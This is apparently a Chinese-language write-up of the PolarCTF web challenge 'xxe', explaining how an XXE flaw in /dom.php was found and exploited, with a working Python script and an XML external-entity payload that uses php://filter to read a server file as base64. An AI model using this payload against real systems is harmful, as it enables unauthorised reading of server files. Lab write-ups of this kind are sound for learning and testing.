Polar Web【中等】xxe

Polar Web【中等】xxe

Contents

思路&探索

如题目所示,此题考查XXE漏洞,具体细节需要逐步深挖

  1. 打开站点,提示了flag所在的文件,点击按钮,可见php的配置信息,搜索xml发现该服务可读取外部XML实体
  2. 由于并不清楚具体的注入路径,因此先对站点进行扫描,发现存在/dom.php路径
  3. 进入该路径发现下图中的报错信息,根据XXE漏洞的操作方式,采用POST方法将构造好的XML字符串传入/dom.php 站点,得到一串经由base64编码的字符串,解码后得到flag
  • 本文采用手动和脚本两种方式来实现解答


  • 在使用HackBar传入时,经测试使用下面的模式来传数据才能生效


EXP

python 复制代码
import requests
import base64


def attack(url, pl):
    resp = requests.post(url, pl).text
    if resp:
    	# 为方便可读,对输出稍作处理
        out = resp[resp.index('textContent') + 16:resp.rindex(')')]
        out = base64.b64decode(out.encode()).decode()
        out = out[out.index('flag'):]
        print(out)
    else:
        print("Nothing...")


if __name__ == '__main__':
    u = 'http://~.www.polarctf.com:8090/dom.php'
    payload = '''<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE polar [
        <!ELEMENT name ANY >
        <!ENTITY polar SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
        ]>
<name>&polar;</name>
    '''
    attack(u, payload)

运行&总结

  • 本题考查XXE漏洞的基本原理以及渗透方式,需要对XML文档结构和XML实体的引入方式有所了解
  • 在构造的外部XML实体中,采用的是php://filter/read(伪协议读取模块)中的base64编码器实现对服务器文件flagggg.php的读取

敬,不完美的明天

相关推荐
2301_780789669 小时前
云服务器被黑能恢复吗?云服务器被黑的解决办法
运维·服务器·网络·安全·web安全
GuiltyFet9 小时前
【无标题】
安全·ai
思维新观察11 小时前
安全用充电宝:风险识别、标识解读与科学使用全指南
安全·充电宝·三看·安全用充电宝
Chockmans11 小时前
春秋云境CVE-2017-17733
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2017-17733
上海云盾商务经理杨杨12 小时前
Web渗透核心漏洞:SQL注入漏洞测试与修复实战
数据库·sql·安全
Championship.23.2413 小时前
AI驱动的网络安全革命:威胁检测与防御实战指南
人工智能·安全·web安全
汽车仪器仪表相关领域15 小时前
Kvaser Air Bridge Light HS:免配置工业级无线 CAN 桥接器,70 米稳定传输,移动设备与动态场景的 CAN 互联理想之选
人工智能·功能测试·安全·单元测试·汽车·可用性测试
上海云盾王帅16 小时前
WEB业务如何接入安全防护:从零到一的实战指南
前端·安全
其实防守也摸鱼16 小时前
软件安全与漏洞--软件安全设计
运维·网络·安全·网络安全·密码学·需求分析·软件安全
一只数据集17 小时前
NVIDIA Nemotron AIQ Agentic Safety Dataset:面向企业级智能体系统的安全与防护评估数据集全面解析
网络·数据库·安全